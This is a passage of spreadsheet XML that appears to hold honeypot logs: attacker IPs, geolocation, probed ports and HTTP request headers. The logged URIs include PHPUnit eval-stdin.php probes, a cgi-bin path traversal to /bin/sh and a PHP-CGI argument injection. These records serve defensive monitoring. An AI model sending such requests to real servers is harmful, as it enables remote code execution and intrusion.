'Custom-AsyncHttpClient', 'method': 'GET', 'uri': '/vendor/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'keep-alive', 'Content-Length': '33', 'Content-Type': 'text/plain', 'Host': '193.57.136.113:80', 'Upgrade-Insecure-Requests': '1', 'User-Agent': 'Custom-AsyncHttpClient', 'method': 'GET', 'uri': '/phpunit/phpunit/src/Util/PHP/eval-stdin.php'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'keep-alive', 'Content-Length': '33', 'Content-Type': 'text/plain', 'Host': '193.57.136.113:80', 'Upgrade-Insecure-Requests': '1', 'User-Agent': 'Custom-AsyncHttpClient', 'method': 'GET', 'uri': '/phpunit/phpunit/Util/PHP/eval-stdin.php'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'keep-alive', 'Content-Length': '33', 'Content-Type': 'text/plain', 'Host': '193.57.136.113:80', 'Upgrade-Insecure-Requests': '1', 'User-Agent': 'Custom-AsyncHttpClient', 'method': 'GET', 'uri': '/phpunit/src/Util/PHP/eval-stdin.php'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'keep-alive', 'Content-Length': '33', 'Content-Type': 'text/plain', 'Host': '193.57.136.113:80', 'Upgrade-Insecure-Requests': '1', 'User-Agent': 'Custom-AsyncHttpClient', 'method': 'GET', 'uri': '/phpunit/Util/PHP/eval-stdin.php'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'keep-alive', 'Content-Length': '33', 'Content-Type': 'text/plain', 'Host': '193.57.136.113:80', 'Upgrade-Insecure-Requests': '1', 'User-Agent': 'Custom-AsyncHttpClient', 'method': 'GET', 'uri': '/lib/phpunit/phpunit/src/Util/PHP/eval-stdin.php'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'keep-alive', 'Content-Length': '33', 'Content-Type': 'text/plain', 'Host': '193.57.136.113:80', 'Upgrade-Insecure-Requests': '1', 'User-Agent': 'Custom-AsyncHttpClient', 'method': 'GET', 'uri': '/lib/phpunit/phpunit/Util/PHP/eval-stdin.php'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'keep-alive', 'Content-Length': '33', 'Content-Type': 'text/plain', 'Host': '193.57.136.113:80', 'Upgrade-Insecure-Requests': '1', 'User-Agent': 'Custom-AsyncHttpClient', 'method': 'GET', 'uri': '/lib/phpunit/src/Util/PHP/eval-stdin.php'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'keep-alive', 'Content-Length': '33', 'Content-Type': 'text/plain', 'Host': '193.57.136.113:80', 'Upgrade-Insecure-Requests': '1', 'User-Agent': 'Custom-AsyncHttpClient', 'method': 'GET', 'uri': '/lib/phpunit/Util/PHP/eval-stdin.php'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'keep-alive', 'Content-Length': '33', 'Content-Type': 'text/plain', 'Host': '193.57.136.113:80', 'Upgrade-Insecure-Requests': '1', 'User-Agent': 'Custom-AsyncHttpClient', 'method': 'GET', 'uri': '/lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'keep-alive', 'Content-Length': '33', 'Content-Type': 'text/plain', 'Host': '193.57.136.113:80', 'Upgrade-Insecure-Requests': '1', 'User-Agent': 'Custom-AsyncHttpClient', 'method': 'GET', 'uri': '/laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'keep-alive', 'Content-Length': '33', 'Content-Type': 'text/plain', 'Host': '193.57.136.113:80', 'Upgrade-Insecure-Requests': '1', 'User-Agent': 'Custom-AsyncHttpClient', 'method': 'GET', 'uri': '/www/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'keep-alive', 'Content-Length': '33', 'Content-Type': 'text/plain', 'Host': '193.57.136.113:80', 'Upgrade-Insecure-Requests': '1', 'User-Agent': 'Custom-AsyncHttpClient', 'method': 'GET', 'uri': '/ws/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'keep-alive', 'Content-Length': '33', 'Content-Type': 'text/plain', 'Host': '193.57.136.113:80', 'Upgrade-Insecure-Requests': '1', 'User-Agent': 'Custom-AsyncHttpClient', 'method': 'GET', 'uri': '/yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'keep-alive', 'Content-Length': '33', 'Content-Type': 'text/plain', 'Host': '193.57.136.113:80', 'Upgrade-Insecure-Requests': '1', 'User-Agent': 'Custom-AsyncHttpClient', 'method': 'GET', 'uri': '/zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'keep-alive', 'Content-Length': '33', 'Content-Type': 'text/plain', 'Host': '193.57.136.113:80', 'Upgrade-Insecure-Requests': '1', 'User-Agent': 'Custom-AsyncHttpClient', 'method': 'GET', 'uri': '/ws/ec/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'keep-alive', 'Content-Length': '33', 'Content-Type': 'text/plain', 'Host': '193.57.136.113:80', 'Upgrade-Insecure-Requests': '1', 'User-Agent': 'Custom-AsyncHttpClient', 'method': 'GET', 'uri': '/V2/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'keep-alive', 'Content-Length': '105', 'Content-Type': 'text/plain', 'Host': '38.60.209.6:80', 'Upgrade-Insecure-Requests': '1', 'User-Agent': 'Custom-AsyncHttpClient', 'method': 'POST', 'uri': '/cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'keep-alive', 'Content-Length': '225', 'Content-Type': 'application/x-www-form-urlencoded', 'Host': '38.60.209.6:80', 'Upgrade-Insecure-Requests': '1', 'User-Agent': 'Custom-AsyncHttpClient', 'method': 'POST', 'uri': '/hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'keep-alive', 'Content-Length': '33', 'Content-Type': 'text/plain', 'Host': '38.60.209.6:80', 'Upgrade-Insecure-Requests': '1', 'User-Agent': 'Custom-AsyncHttpClient', 'method': 'GET', 'uri': '/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'keep-alive', 'Content-Length': '33', 'Content-Type': 'text/plain', 'Host': '38.60.209.6:80', 'Upgrade-Insecure-Requests': '1', 'User-Agent': 'Custom-AsyncHttpClient', 'method': 'GET', 'uri': '/vendor/phpunit/phpunit/Util/PHP/eval-stdin.php'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'keep-alive', 'Content-Length': '33', 'Content-Type': 'text/plain', 'Host': '38.60.209.6:80', 'Upgrade-Insecure-Requests': '1', 'User-Agent': 'Custom-AsyncHttpClient', 'method': 'GET', 'uri': '/vendor/phpunit/src/Util/PHP/eval-stdin.php'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'keep-alive', 'Content-Length': '33', 'Content-Type': 'text/plain', 'Host': '38.60.209.6:80', 'Upgrade-Insecure-Requests': '1', 'User-Agent': 'Custom-AsyncHttpClient', 'method': 'GET', 'uri': '/vendor/phpunit/Util/PHP/eval-stdin.php'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'keep-alive', 'Content-Length': '33', 'Content-Type': 'text/plain', 'Host': '38.60.209.6:80', 'Upgrade-Insecure-Requests': '1', 'User-Agent': 'Custom-AsyncHttpClient', 'method': 'GET', 'uri': '/vendor/phpunit/phpunit/LICENSE/eval-stdin.php'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'keep-alive', 'Content-Length': '33', 'Content-Type': 'text/plain', 'Host': '38.60.209.6:80', 'Upgrade-Insecure-Requests': '1', 'User-Agent': 'Custom-AsyncHttpClient', 'method': 'GET', 'uri': '/vendor/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'keep-alive', 'Content-Length': '33', 'Content-Type': 'text/plain', 'Host': '38.60.209.6:80', 'Upgrade-Insecure-Requests': '1', 'User-Agent': 'Custom-AsyncHttpClient', 'method': 'GET', 'uri': '/phpunit/phpunit/src/Util/PHP/eval-stdin.php'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'keep-alive', 'Content-Length': '33', 'Content-Type': 'text/plain', 'Host': '38.60.209.6:80', 'Upgrade-Insecure-Requests': '1', 'User-Agent': 'Custom-AsyncHttpClient', 'method': 'GET', 'uri': '/phpunit/phpunit/Util/PHP/eval-stdin.php'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'keep-alive', 'Content-Length': '33', 'Content-Type': 'text/plain', 'Host': '38.60.209.6:80', 'Upgrade-Insecure-Requests': '1', 'User-Agent': 'Custom-AsyncHttpClient', 'method': 'GET', 'uri': '/phpunit/src/Util/PHP/eval-stdin.php'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'keep-alive', 'Content-Length': '33', 'Content-Type': 'text/plain', 'Host': '38.60.209.6:80', 'Upgrade-Insecure-Requests': '1', 'User-Agent': 'Custom-AsyncHttpClient', 'method': 'GET', 'uri': '/lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'keep-alive', 'Content-Length': '33', 'Content-Type': 'text/plain', 'Host': '38.60.209.6:80', 'Upgrade-Insecure-Requests': '1', 'User-Agent': 'Custom-AsyncHttpClient', 'method': 'GET', 'uri': '/laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'keep-alive', 'Content-Length': '33', 'Content-Type': 'text/plain', 'Host': '38.60.209.6:80', 'Upgrade-Insecure-Requests': '1', 'User-Agent': 'Custom-AsyncHttpClient', 'method': 'GET', 'uri': '/www/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'keep-alive', 'Content-Length': '33', 'Content-Type': 'text/plain', 'Host': '38.60.209.6:80', 'Upgrade-Insecure-Requests': '1', 'User-Agent': 'Custom-AsyncHttpClient', 'method': 'GET', 'uri': '/ws/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'keep-alive', 'Content-Length': '33', 'Content-Type': 'text/plain', 'Host': '38.60.209.6:80', 'Upgrade-Insecure-Requests': '1', 'User-Agent': 'Custom-AsyncHttpClient', 'method': 'GET', 'uri': '/yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'keep-alive', 'Content-Length': '33', 'Content-Type': 'text/plain', 'Host': '38.60.209.6:80', 'Upgrade-Insecure-Requests': '1', 'User-Agent': 'Custom-AsyncHttpClient', 'method': 'GET', 'uri': '/zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'keep-alive', 'Content-Length': '33', 'Content-Type': 'text/plain', 'Host': '38.60.209.6:80', 'Upgrade-Insecure-Requests': '1', 'User-Agent': 'Custom-AsyncHttpClient', 'method': 'GET', 'uri': '/ws/ec/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'keep-alive', 'Content-Length': '33', 'Content-Type': 'text/plain', 'Host': '38.60.209.6:80', 'Upgrade-Insecure-Requests': '1', 'User-Agent': 'Custom-AsyncHttpClient', 'method': 'GET', 'uri': '/V2/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'keep-alive', 'Content-Length': '33', 'Content-Type': 'text/plain', 'Host': '38.60.209.6:80', 'Upgrade-Insecure-Requests': '1', 'User-Agent': 'Custom-AsyncHttpClient', 'method': 'GET', 'uri': '/tests/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'keep-alive', 'Content-Length': '33', 'Content-Type': 'text/plain', 'Host': '38.60.209.6:80', 'Upgrade-Insecure-Requests': '1', 'User-Agent': 'Custom-AsyncHttpClient', 'method': 'GET', 'uri': '/test/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'keep-alive', 'Content-Length': '33', 'Content-Type': 'text/plain', 'Host': '38.60.209.6:80', 'Upgrade-Insecure-Requests': '1', 'User-Agent': 'Custom-AsyncHttpClient', 'method': 'GET', 'uri': '/testing/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'keep-alive', 'Content-Length': '33', 'Content-Type': 'text/plain', 'Host': '38.60.209.6:80', 'Upgrade-Insecure-Requests': '1', 'User-Agent': 'Custom-AsyncHttpClient', 'method': 'GET', 'uri': '/api/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'keep-alive', 'Content-Length': '33', 'Content-Type': 'text/plain', 'Host': '38.60.209.6:80', 'Upgrade-Insecure-Requests': '1', 'User-Agent': 'Custom-AsyncHttpClient', 'method': 'GET', 'uri': '/demo/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'keep-alive', 'Content-Length': '33', 'Content-Type': 'text/plain', 'Host': '38.60.209.6:80', 'Upgrade-Insecure-Requests': '1', 'User-Agent': 'Custom-AsyncHttpClient', 'method': 'GET', 'uri': '/cms/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'keep-alive', 'Content-Length': '33', 'Content-Type': 'text/plain', 'Host': '38.60.209.6:80', 'Upgrade-Insecure-Requests': '1', 'User-Agent': 'Custom-AsyncHttpClient', 'method': 'GET', 'uri': '/crm/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'keep-alive', 'Content-Length': '33', 'Content-Type': 'text/plain', 'Host': '38.60.209.6:80', 'Upgrade-Insecure-Requests': '1', 'User-Agent': 'Custom-AsyncHttpClient', 'method': 'GET', 'uri': '/admin/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'keep-alive', 'Content-Length': '33', 'Content-Type': 'text/plain', 'Host': '38.60.209.6:80', 'Upgrade-Insecure-Requests': '1', 'User-Agent': 'Custom-AsyncHttpClient', 'method': 'GET', 'uri': '/backup/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'keep-alive', 'Content-Length': '33', 'Content-Type': 'text/plain', 'Host': '38.60.209.6:80', 'Upgrade-Insecure-Requests': '1', 'User-Agent': 'Custom-AsyncHttpClient', 'method': 'GET', 'uri': '/blog/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Connection': 'keep-alive', 'Content-Length': '105', 'Content-Type': 'text/plain', 'Host': '38.60.224.106:443', 'Upgrade-Insecure-Requests': '1', 'User-Agent': 'Custom-AsyncHttpClient', 'method': 'POST', 'uri': '/cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Connection': 'keep-alive', 'Content-Length': '105', 'Content-Type': 'text/plain', 'Host': '144.126.148.5:443', 'Upgrade-Insecure-Requests': '1', 'User-Agent': 'Custom-AsyncHttpClient', 'method': 'POST', 'uri': '/cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh'}}</t>
  </si>
  <si>
    <t>::ffff:b93c:8825</t>
  </si>
  <si>
    <t>7785dec641821ade87d05cb7424e7687</t>
  </si>
  <si>
    <t>68.235.46.166</t>
  </si>
  <si>
    <t>NA&amp;&amp;static-68-235-46-166.cust.tzulo.com</t>
  </si>
  <si>
    <t>SMA-LAB_MYSQL_H5&amp;&amp;SMA-LAB_MYSQL_HC1</t>
  </si>
  <si>
    <t>Massachusetts</t>
  </si>
  <si>
    <t>Essex</t>
  </si>
  <si>
    <t>Topsfield</t>
  </si>
  <si>
    <t>4953127</t>
  </si>
  <si>
    <t>01983</t>
  </si>
  <si>
    <t>42.6376</t>
  </si>
  <si>
    <t>-70.9495</t>
  </si>
  <si>
    <t>2010-03-10</t>
  </si>
  <si>
    <t>::ffff:44eb:2ea6</t>
  </si>
  <si>
    <t>cf9d65896e58c7a131dc249dee261c68</t>
  </si>
  <si>
    <t>185.222.95.178</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_SMB_H44&amp;&amp;SMA-LAB_MSSQL_H44&amp;&amp;SMA-LAB_SSH_H44&amp;&amp;SMA-LAB_LDAP_H46&amp;&amp;SMA-LAB_HTTP_H5&amp;&amp;SMA-LAB_MT-CPA_H5&amp;&amp;SMA-LAB_MSSQL_H23&amp;&amp;SMA-LAB_SMB_H34&amp;&amp;SMA-LAB_MYSQL_H10&amp;&amp;SMA-LAB_MYSQL_HC1&amp;&amp;SMA-LAB_MYSQL_H46&amp;&amp;SMA-LAB_MYSQL_H13&amp;&amp;SMA-LAB_MSSQL_H13</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;445&amp;&amp;1433&amp;&amp;22&amp;&amp;389&amp;&amp;80&amp;&amp;26031&amp;&amp;445&amp;&amp;3306</t>
  </si>
  <si>
    <t>ABS</t>
  </si>
  <si>
    <t>Abşeron</t>
  </si>
  <si>
    <t>Saray</t>
  </si>
  <si>
    <t>585145</t>
  </si>
  <si>
    <t>40.533</t>
  </si>
  <si>
    <t>49.7168</t>
  </si>
  <si>
    <t>203971</t>
  </si>
  <si>
    <t>AzFiberNet Ltd.</t>
  </si>
  <si>
    <t>Datacenter</t>
  </si>
  <si>
    <t>::ffff:b9de:5fb2</t>
  </si>
  <si>
    <t>ba44ab1a196aeb7b088ca5111701da09</t>
  </si>
  <si>
    <t>113.160.202.198</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_MT-CPA_H33&amp;&amp;SMA-LAB_MYSQL_H13&amp;&amp;SMA-LAB_MT-CPA_H10&amp;&amp;SMA-LAB_MYSQL_HC1&amp;&amp;SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_MSSQL_H13</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;41984&amp;&amp;3306&amp;&amp;8291&amp;&amp;1433&amp;&amp;445</t>
  </si>
  <si>
    <t>18</t>
  </si>
  <si>
    <t>Ninh Bình Province</t>
  </si>
  <si>
    <t>Yên Khánh District</t>
  </si>
  <si>
    <t>Yên Ninh</t>
  </si>
  <si>
    <t>1560143</t>
  </si>
  <si>
    <t>20.184</t>
  </si>
  <si>
    <t>106.061</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_MYSQL:NA}&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (113.160.202.198,57831)}</t>
  </si>
  <si>
    <t>::ffff:71a0:cac6</t>
  </si>
  <si>
    <t>The attacker is attempting to scan for open ports and services on a target system, likely using a script or tool to automate the process. They are sending out probes and requests to various services, such as FTP, HTTP, HTTPS, DNS, etc., in an attempt to identify vulnerabilities and potential entry points. &amp;&amp; The attacker is scanning for and attempting to exploit various network services, including DHCP, DNS, FTP, HTTP, HTTPS, IMAP, IPP, LDAP, MSSQL, MYSQL, NTP, Oracle, PJL, POP3, POSTGRES, RDP, REDIS, SIP, SMB, SMTP, SNMP, and other protocols. The attacker is likely using a script or tool to quickly scan and attempt to connect to these services in an automated manner.</t>
  </si>
  <si>
    <t xml:space="preserve">Port scanning attack &amp;&amp;  </t>
  </si>
  <si>
    <t>9968776da386dc0b1f51b2b91f8c479f</t>
  </si>
  <si>
    <t>178.210.203.62</t>
  </si>
  <si>
    <t>['attack-source'&amp;&amp; 'attack-target:web'&amp;&amp; 'attack-target:ftp']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic</t>
  </si>
  <si>
    <t>SMA-LAB_MT-CPA_H14&amp;&amp;SMA-LAB_FTP_HC1</t>
  </si>
  <si>
    <t>57972&amp;&amp;21</t>
  </si>
  <si>
    <t>{'all.s5h.net': ['unknown']&amp;&amp; 'rbl.interserver.net': ['unknown']}</t>
  </si>
  <si>
    <t>47359</t>
  </si>
  <si>
    <t>Tvoi Net Ltd.</t>
  </si>
  <si>
    <t>Citynet Network</t>
  </si>
  <si>
    <t>2010-06-21</t>
  </si>
  <si>
    <t>None&amp;&amp;{Data_FTP:NA}</t>
  </si>
  <si>
    <t>::ffff:b2d2:cb3e</t>
  </si>
  <si>
    <t>25c771769ae2980c9cdf151a490bb1fd</t>
  </si>
  <si>
    <t>181.31.121.224</t>
  </si>
  <si>
    <t>::ffff:b51f:79e0</t>
  </si>
  <si>
    <t>85d728aa237d8c1219222a2aaf2b0fed</t>
  </si>
  <si>
    <t>178.32.72.218</t>
  </si>
  <si>
    <t>daisy.probe.onyphe.net&amp;&amp;NA</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_SOCKS5_H41&amp;&amp;SMA-LAB_HTTP_H12&amp;&amp;SMA-LAB_HTTP_H4&amp;&amp;SMA-LAB_DNS_H36&amp;&amp;SMA-LAB_MT-CPA_H46&amp;&amp;SMA-LAB_DNS_H10&amp;&amp;SMA-LAB_MT-CPA_H29&amp;&amp;SMA-LAB_LDAP_H29&amp;&amp;SMA-LAB_IMAP_H40&amp;&amp;SMA-LAB_DHCP_H24&amp;&amp;SMA-LAB_MT-CPA_H32&amp;&amp;SMA-LAB_MT-CPA_H21&amp;&amp;SMA-LAB_MSSQL_H39&amp;&amp;SMA-LAB_REDIS_H14&amp;&amp;SMA-LAB_LDAP_H14&amp;&amp;SMA-LAB_VNC_H40&amp;&amp;SMA-LAB_HTTPS_H21&amp;&amp;SMA-LAB_POSTGRES_H21&amp;&amp;SMA-LAB_HTTP_H8&amp;&amp;SMA-LAB_HTTP_H16&amp;&amp;SMA-LAB_HTTP_H7&amp;&amp;SMA-LAB_HTTPS_HC1&amp;&amp;SMA-LAB_POP3_H25&amp;&amp;SMA-LAB_LDAP_H28</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;1080&amp;&amp;53&amp;&amp;8112&amp;&amp;53&amp;&amp;19459&amp;&amp;389&amp;&amp;143&amp;&amp;67&amp;&amp;46907&amp;&amp;21740&amp;&amp;1433&amp;&amp;6379&amp;&amp;5900&amp;&amp;443&amp;&amp;5432&amp;&amp;8443&amp;&amp;110&amp;&amp;NA&amp;&amp;1521&amp;&amp;38227&amp;&amp;23&amp;&amp;80&amp;&amp;445</t>
  </si>
  <si>
    <t>{'all.s5h.net': ['unknown']&amp;&amp; 'spamsources.fabel.dk': ['unknown']}</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_LDAP:NA}&amp;&amp;{Data_VNC:NA}&amp;&amp;{Data_HTTPS:{'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', 'Accept-Language': 'en-US,en;q=0.5', 'Connection': 'close', 'Host': '38.54.115.66', 'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:130.0) Gecko/20100101 Firefox/130.0', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:NA}&amp;&amp;{Data_REDIS:NA}&amp;&amp;{Data_POP3:NA}&amp;&amp;{Data_ORACLE:NA}&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_POSTGRES:NA}&amp;&amp;{Data_HTTP:{'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', 'Accept-Language': 'en-US,en;q=0.5', 'Connection': 'close', 'Host': '185.250.150.39', 'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:130.0) Gecko/20100101 Firefox/130.0', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTP:{'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', 'Accept-Language': 'en-US,en;q=0.5', 'Connection': 'close', 'Host': '193.57.136.113', 'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:130.0) Gecko/20100101 Firefox/130.0', 'method': 'GET', 'uri': '/favicon.ico'}}&amp;&amp;{Data_HTTPS:{'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', 'Accept-Language': 'en-US,en;q=0.5', 'Connection': 'close', 'Host': '95.164.21.98', 'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:130.0) Gecko/20100101 Firefox/130.0', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_SMB:Incoming connection (178.32.72.218,38535)}&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (178.32.72.218,37243)}</t>
  </si>
  <si>
    <t>::ffff:b220:48da</t>
  </si>
  <si>
    <t>c2461ddcf1e347ae6a226d77bef9d14f</t>
  </si>
  <si>
    <t>122.175.11.80</t>
  </si>
  <si>
    <t>1433&amp;&amp;58707&amp;&amp;58711</t>
  </si>
  <si>
    <t>NTR</t>
  </si>
  <si>
    <t>Vijayawada</t>
  </si>
  <si>
    <t>1253184</t>
  </si>
  <si>
    <t>520001</t>
  </si>
  <si>
    <t>16.5062</t>
  </si>
  <si>
    <t>80.648</t>
  </si>
  <si>
    <t>ABTS-AP-DSL-9112-hyd</t>
  </si>
  <si>
    <t>::ffff:7aaf:b50</t>
  </si>
  <si>
    <t>d9a15a26dfdb38e7465b18ac590a4566</t>
  </si>
  <si>
    <t>108.180.97.118</t>
  </si>
  <si>
    <t>BC</t>
  </si>
  <si>
    <t>British Columbia</t>
  </si>
  <si>
    <t>Metro Vancouver Regional District</t>
  </si>
  <si>
    <t>Vancouver (East Vancouver)</t>
  </si>
  <si>
    <t>6173331</t>
  </si>
  <si>
    <t>V5T</t>
  </si>
  <si>
    <t>49.2617</t>
  </si>
  <si>
    <t>-123.097</t>
  </si>
  <si>
    <t>852</t>
  </si>
  <si>
    <t>TELUS Communications Inc.</t>
  </si>
  <si>
    <t>TELUS Communications Inc</t>
  </si>
  <si>
    <t>TELUS-FIBRE-VANCBC08</t>
  </si>
  <si>
    <t>::ffff:6cb4:6176</t>
  </si>
  <si>
    <t>2bc85fa7ee64711d3e61c46d0a61be20</t>
  </si>
  <si>
    <t>141.98.10.193</t>
  </si>
  <si>
    <t>['attack-source'&amp;&amp; 'attack-target:web'&amp;&amp; 'attack-target:mail']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic&amp;&amp;Session Manipulation&amp;&amp;Email Spoofing&amp;&amp;Spam Message Body&amp;&amp;Credential Stuffing</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_SMTP_H19&amp;&amp;SMA-LAB_DNS_H21&amp;&amp;SMA-LAB_MT-CPA_H22&amp;&amp;SMA-LAB_SMTP_H35&amp;&amp;SMA-LAB_SMTP_H10&amp;&amp;SMA-LAB_SMTP_H45&amp;&amp;SMA-LAB_SMTP_H8&amp;&amp;SMA-LAB_SMTP_H47&amp;&amp;SMA-LAB_MT-CPA_H19&amp;&amp;SMA-LAB_SMTP_H46&amp;&amp;SMA-LAB_SMTP_H18&amp;&amp;SMA-LAB_SMTP_H29&amp;&amp;SMA-LAB_SMTP_HC1</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;25&amp;&amp;53&amp;&amp;16244&amp;&amp;61905&amp;&amp;NA</t>
  </si>
  <si>
